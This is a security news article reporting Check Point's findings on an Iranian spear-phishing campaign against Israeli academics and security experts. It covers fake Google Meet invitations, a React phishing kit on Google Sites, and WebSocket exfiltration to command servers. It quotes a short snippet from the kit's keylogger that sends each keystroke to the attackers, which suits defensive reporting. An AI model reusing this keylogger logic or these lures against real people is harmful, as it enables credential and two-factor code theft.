A sophisticated spear-phishing campaign targeting Israeli cybersecurity experts and computer science professors has emerged amid escalating tensions between Iran and Israel.
The Iranian threat group Educated Manticore, widely associated with the Islamic Revolutionary Guard Corps’ Intelligence Organization, has launched precision attacks against leading academics from Israeli universities and high-profile cybersecurity professionals since mid-June 2025.
The attackers employ deceptive social engineering tactics, impersonating fictitious employees of prominent cybersecurity companies through carefully crafted emails and WhatsApp messages.
These communications request consultations on enhancing cybersecurity for energy companies, leveraging the current geopolitical climate to create urgency and legitimacy.
The threat actors demonstrate remarkable sophistication in their approach, utilizing AI-assisted content generation to produce formal, error-free communications that initially appear genuine to potential victims.
Check Point researchers identified that the campaign represents a significant evolution in Educated Manticore’s operational capabilities, marking a new phase where the group specifically targets the credibility of cybersecurity organizations to gain victim trust.
The attackers guide engaged targets toward fake Google Meet invitations or credential harvesting pages, designed to intercept both passwords and two-factor authentication codes through advanced phishing infrastructure.
The campaign utilizes multi-stage phishing pages hosted on Google Sites service, adding legitimacy through the trusted Google domain.
Once victims interact with these pages, they encounter a sophisticated React-based Single Page Application designed to closely mimic legitimate Google authentication flows.
The technical foundation of this campaign centers on a custom-built phishing kit implemented as a React-based Single Page Application.
The malicious infrastructure demonstrates remarkable technical sophistication, utilizing dynamic UI rendering and real-time data exfiltration capabilities that distinguish it from conventional phishing operations.
The phishing kit maintains persistent WebSocket connections on the /sessions endpoint, establishing continuous communication channels with command-and-control servers.
This architecture enables real-time credential harvesting through an integrated passive keylogger that captures every keystroke, transmitting data even when users abandon forms without submission:-
n && !t && n.send(JSON.stringify({
d: "kl",
c: a.which in 1s ? ls [a.which] : a.key,
sk: localStorage.getItem("sk"),
page: e
})) The infrastructure spans over 130 unique domains resolving to multiple IP addresses, primarily registered through NameCheap.
This extensive network enables rapid infrastructure rotation when domains are identified and taken down, ensuring campaign continuity despite increased security scrutiny.
Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions -> Try ANY.RUN now
Microsoft has pushed out an emergency, out-of-band Windows 11 update after its September Patch Tuesday…
CDR is the runtime, real-time half of cloud security: while CSPM tells you what’s misconfigured,…
Your SaaS estate M365, Salesforce, Workday, Slack, hundreds of others is a sprawl of misconfigurations,…
DSPM finds sensitive data you didn’t know you had, classifies it, maps who can reach…
Open-source packages are meant to save developers time. In the GemStuffer campaign, that trust became…
Google has released an important Chrome 153 security update that fixes 42 vulnerabilities across the…